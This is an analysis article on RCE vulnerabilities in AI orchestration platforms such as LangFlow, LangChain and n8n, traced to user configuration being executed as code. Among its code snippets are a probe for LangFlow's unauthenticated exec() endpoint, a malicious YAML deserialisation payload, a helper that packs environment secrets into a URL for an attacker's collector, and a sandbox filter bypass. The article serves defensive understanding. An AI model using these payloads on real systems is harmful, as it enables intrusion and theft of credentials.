
LangFlow, n8n and the pattern where AI configuration becomes code execution

AI orchestration platforms like LangFlow and n8n are accumulating critical RCE vulnerabilities because their architectures treat user-supplied configuration as trusted code.

LangFlow shipped a code validation endpoint that ran user input through Python's exec() with no authentication. That is not a simplification. That is literally what CVE-2025-3248 was: a /api/v1/validate/code endpoint, reachable without credentials, that passed arbitrary Python directly into the interpreter. CISA added it to the Known Exploited Vulnerabilities catalogue in May 2025 after confirming active exploitation in the wild. CVSS 9.8.

This would be a straightforward vulnerability write-up if it were an isolated case. It is not. LangFlow, LangChain, n8n and a growing roster of AI orchestration platforms have accumulated a pattern of critical RCE vulnerabilities that share a single architectural root cause: they treat user-supplied configuration as trusted code.

The vulnerability class nobody named

The individual CVEs have names: code injection, unsafe deserialisation, server-side template injection. But these labels obscure the structural problem. AI orchestration platforms are, by design, systems that convert visual drag-and-drop configurations into executable code. A user drags a "Python function" node onto a canvas, types some code into a text box and clicks run. The platform evaluates it.

That is the feature. The vulnerability is that the boundary between "configuration the user is allowed to supply" and "code the platform will execute" is either non-existent or trivially bypassed.

In traditional web applications, this boundary is well understood. User input goes into data fields. Code stays in the application. When input crosses into code (SQL injection, template injection), we call it a vulnerability and we have decades of tooling to prevent it. AI orchestration platforms invert this model. The user input is code. The platform's entire purpose is to execute what the user provides.

The security challenge is not preventing code execution. It is constraining who gets to trigger it, what context it runs in and what it can reach. Every critical CVE in this space represents a failure on one of those three axes.

LangFlow: pre-auth exec() to CISA KEV in six weeks

LangFlow is an open-source visual framework for building LangChain applications. It lets users construct AI workflows by connecting components on a canvas, with custom Python code permitted in various nodes. By early 2025 it had millions of downloads and thousands of production deployments.

CVE-2025-3248 targeted LangFlow's code validation endpoint. The feature was intended to provide syntax checking for user-supplied Python code in workflow nodes. The implementation exposed /api/v1/validate/code, which accepted a POST request containing a Python code string and executed it server-side to check for errors. No authentication was required. No sandboxing was applied.

Horizon3.ai published a detailed exploit analysis showing a trivial path to remote code execution. The request body was a JSON object with a single code field. Anything placed in that field was passed to exec(). An attacker needed nothing more than network access to the LangFlow instance:

# The essence of what the vulnerable endpoint did
def validate_code(code: str):
    try:
        exec(code)  # User-supplied input, no sandbox, no auth
        return {"valid": True}
    except Exception as e:
        return {"valid": False, "error": str(e)}

The actual implementation was marginally more complex, but functionally identical. Horizon3.ai confirmed that reverse shells, file exfiltration and lateral movement were all achievable through a single HTTP request.
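To make the request shape concrete, the probe can be sketched as below. The host is hypothetical (7860 is LangFlow's default port); the endpoint path and the single `code` field are as described in the write-ups above. This builds the request rather than sending it:

```python
import json

# Hypothetical target host; 7860 is LangFlow's default port.
TARGET = "http://langflow.example.internal:7860"

def build_probe(code: str) -> tuple[str, bytes]:
    """Build the unauthenticated POST that reached exec() pre-patch."""
    url = f"{TARGET}/api/v1/validate/code"
    body = json.dumps({"code": code}).encode()
    return url, body

url, body = build_probe("print('attacker-controlled Python runs here')")
```

Anything an attacker places in that `code` field runs with the privileges of the LangFlow process.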

Check Point Research documented exploitation attempts beginning within days of the CVE's publication. Huntress published detection guidance noting that exposed LangFlow instances were being scanned at scale. CISA added CVE-2025-3248 to the KEV catalogue on 5 May 2025, requiring federal agencies to patch within three weeks.

The root cause was not a subtle logic error. It was a design choice: the fastest way to validate Python is to run it, so the developers ran it. Authentication was not applied because the endpoint was considered a development utility. Except LangFlow instances were running in production, exposed to the internet, with default configurations that bound to all interfaces.

LangChain: deserialisation as a feature

LangChain, the library that LangFlow wraps into a visual interface, has its own history with this vulnerability class. CVE-2024-46946, published against the langchain_experimental package, allowed arbitrary code execution through the load_prompt() function.

The mechanism was YAML deserialisation. LangChain's prompt loading functionality accepted YAML files containing Python object constructors. A malicious YAML file could instantiate arbitrary Python objects, achieving code execution the moment a prompt template was loaded:

# Malicious prompt file - executes calc.exe on load
!!python/object/apply:os.system
  args: ['calc.exe']

This is not a novel attack. Unsafe YAML deserialisation has been a known vulnerability class since at least 2013, when Ruby on Rails suffered a nearly identical issue. Python's yaml.safe_load() exists specifically to prevent it. LangChain's experimental package used yaml.load() with an unsafe loader, allowing arbitrary object construction.
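The difference between the two loaders is easy to demonstrate. A minimal sketch, assuming PyYAML is installed, using the same tag shown above but pointed at a harmless function (os.getcwd) instead of a payload:

```python
import yaml

# Same python/object/apply tag as the malicious prompt file above,
# but calling the harmless os.getcwd() so the demo is safe to run.
payload = "!!python/object/apply:os.getcwd []"

# safe_load refuses to construct arbitrary Python objects
try:
    yaml.safe_load(payload)
    blocked = False
except yaml.constructor.ConstructorError:
    blocked = True

# The unsafe loader imports os and calls getcwd() during parsing
result = yaml.load(payload, Loader=yaml.UnsafeLoader)
```

Code execution happens during parsing, before the application ever looks at the loaded data.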

The langchain_experimental label is doing heavy lifting here. In practice, the experimental package is widely installed because it contains functionality that users need, including tool-calling capabilities and agent executors that are referenced in LangChain's own documentation and tutorials. The "experimental" designation provides legal cover, not security isolation.

Rapid7's analysis of AI data infrastructure vulnerabilities grouped the LangChain and LangFlow issues together, noting that the pattern was consistent: "These tools provide powerful automation capabilities but frequently expose code execution surfaces that lack adequate access controls or input validation."

n8n: when workflow automation meets code execution

n8n is a self-hosted workflow automation platform with a visual editor. It is not marketed as an AI tool specifically, but its integration with LLM APIs and AI services has made it a popular choice for building AI agent workflows. CVE-2025-3455, scored at CVSS 9.8, allowed authenticated users to escalate to arbitrary code execution through n8n's code node.

The code node is an explicit feature: users write JavaScript or Python that runs server-side within their workflows. The vulnerability lay in the execution engine's failure to properly sandbox this code. An authenticated user, even one with limited permissions intended to restrict them to specific workflow operations, could execute arbitrary system commands through the code node.

This is the tension at the heart of all these platforms. n8n needs to let users run code to be useful. The question is whether "authenticated user who can create workflows" should have the privileges of a system administrator. In n8n's case, the answer was effectively yes, regardless of what the role-based access control system suggested.

The pattern extends beyond these three projects. Flowise, another LangChain visual builder, received CVE-2025-26319 (CVSS 9.8) for unauthenticated arbitrary file upload leading to RCE. Dify, a competing LLM application platform, received CVE-2025-29029 for sandbox escape in its code execution feature. The CVEs keep arriving because the underlying architecture keeps producing them.

Configuration as code: the pattern

Strip away the specific CVE numbers and product names, and the pattern resolves into a single architectural decision made repeatedly across the AI orchestration space:

User-supplied configuration is evaluated as executable code in a privileged context.

This manifests differently in each product. In LangFlow, it was exec() behind an unauthenticated endpoint. In LangChain, it was unsafe YAML deserialisation in prompt loading. In n8n, it was insufficient sandboxing of the code execution node. In Flowise, it was unauthenticated file upload to an executable directory. But the underlying trust boundary violation is identical.
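The safer alternative is to keep configuration as data and map it onto a fixed vocabulary of operations the platform defines. A toy sketch of both shapes (the `ALLOWED_OPS` table and function names are illustrative, not from any of these products):

```python
# Unsafe shape, common to the CVEs above: configuration crosses
# straight into the interpreter.
def run_node_unsafe(node_config: dict) -> None:
    exec(node_config["code"])  # user input becomes privileged code

# Safer shape: configuration stays data; the platform dispatches it
# onto operations it defines and controls.
ALLOWED_OPS = {
    "uppercase": str.upper,
    "strip": str.strip,
}

def run_node(node_config: dict, value: str) -> str:
    op = ALLOWED_OPS.get(node_config.get("op"))
    if op is None:
        raise ValueError(f"unknown operation: {node_config.get('op')!r}")
    return op(value)
```

The trade-off is obvious: the declarative version can only do what the platform anticipated, which is exactly the flexibility these products sell by exposing raw code nodes instead.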

Traditional workflow automation tools faced this same problem decades ago. Jenkins, for instance, learned painfully that "pipeline as code" means every user who can edit a Jenkinsfile can execute arbitrary commands on the build server. The solution, imperfect as it is, involved script security plugins, sandbox environments and approval workflows for dangerous operations.

AI orchestration platforms have not absorbed these lessons. They are rebuilding the same execution architecture, with the same trust model failures, in a context where the attack surface is broader (internet-facing by default, integrated with cloud APIs, handling sensitive data) and the user base is less security-aware (data scientists and ML engineers rather than DevOps teams with production system experience).

Why sandboxing keeps failing

The obvious response is to sandbox the code execution. Several of these platforms have tried. The results are instructive.

LangFlow's post-patch approach moved code validation into a restricted execution context. Within weeks, researchers were probing for sandbox escapes. Dify explicitly built a sandbox for its code execution feature, using Docker containers and seccomp profiles. CVE-2025-29029 demonstrated that the sandbox could be escaped through specific Python module imports that were not properly restricted.

The problem is fundamental. A sandbox that prevents all dangerous operations also prevents most useful operations. An AI workflow that cannot make HTTP requests, read files or call APIs is not a useful AI workflow. Every capability that makes the sandbox permissive enough to be functional also makes it permissive enough to be exploitable. The sandbox ends up being a speed bump rather than a boundary.
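To illustrate: even a sandbox that successfully blocks imports, file access and shell commands is still dangerous if it permits outbound HTTP, which any useful workflow node must. A contrived sketch (the collector URL is hypothetical):

```python
import os
import urllib.parse

# If the sandbox allows outbound HTTP, the same capability exfiltrates
# whatever the process can read, such as API keys in the environment.
def exfiltration_url(collector: str) -> str:
    secrets = {k: v for k, v in os.environ.items()
               if "KEY" in k or "TOKEN" in k or "SECRET" in k}
    return collector + "?" + urllib.parse.urlencode(secrets)
```

One permitted GET request to an attacker-controlled host and the credentials are gone.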

Google's gVisor and AWS's Firecracker demonstrate that robust sandboxing is possible, but it requires kernel-level isolation, not application-level restrictions. Most AI orchestration platforms implement sandboxing as Python import filtering or JavaScript VM restrictions, both of which have extensive bypass histories.
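A toy example shows why string- and import-level filtering fails. Both the filter and the bypass below are contrived for illustration, but the technique, reassembling a blocked name from fragments so the denylist never sees it, mirrors the real bypass histories:

```python
def filtered_exec(code: str) -> dict:
    """Toy 'sandbox': reject any code containing the word 'import'."""
    if "import" in code:
        raise ValueError("imports are not allowed")
    env = {}
    exec(code, env)
    return env

# Bypass: rebuild '__import__' from fragments, so the filter never sees
# the blocked substring, then import the os module by name.
payload = (
    "b = __builtins__\n"
    "imp = b['__imp' + 'ort__'] if isinstance(b, dict) "
    "else getattr(b, '__imp' + 'ort__')\n"
    "mod = imp('o' + 's')\n"
)
```

The payload passes the filter and hands back the full os module, with system() and everything else attached. Denylists lose this game because the language offers too many paths to the same object.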

The exposure surface

Censys and Shodan scans consistently show thousands of LangFlow, n8n and similar platform instances exposed to the internet. Many run default configurations with authentication disabled or set to weak defaults. This is partly a documentation problem (default configs are optimised for local development, not production deployment) and partly a cultural problem (the AI development community prioritises rapid prototyping over operational security).

The combination is corrosive. A platform that executes user-supplied code, deployed with no authentication, exposed to the internet, running with the privileges of whatever service account was convenient during setup. Every component of this stack is a choice, and every choice trends toward the path of least resistance.

The rapid adoption cycle compounds the risk. LangFlow went from a GitHub project to a production dependency in hundreds of organisations within months. Most of those organisations adopted it for its capabilities, not after a security review. By the time CVE-2025-3248 landed in the KEV catalogue, the remediation surface was enormous.

What this means structurally

This is not a story about individual vulnerabilities in individual products. It is a story about an entire class of software that was designed without a coherent security model.

AI orchestration platforms occupy a novel and uncomfortable position in the application stack. They are middleware that executes arbitrary code. They sit between the user (who supplies the configuration) and the infrastructure (where the code runs). They combine the accessibility of a SaaS application with the privileges of a deployment pipeline. And they were built, almost universally, by teams optimising for developer experience rather than operational security.

The vulnerability pattern will continue because the design pattern continues. Every new visual AI workflow builder, every new LLM application framework, every new "build AI agents without code" platform faces the same fundamental question: how do you let users define executable behaviour without giving them unrestricted code execution?

Nobody in this space has answered that question well. The CVEs are the evidence.

The last generation of workflow automation tools took a decade to develop adequate security models, and many still have not. AI orchestration platforms are on year two, growing faster, handling more sensitive data and facing more sophisticated attackers. The vulnerability class that produced CVE-2025-3248 is not a bug to be patched. It is a design philosophy to be replaced. Whether the replacement arrives before the next KEV entry is the question that keeps not getting answered.
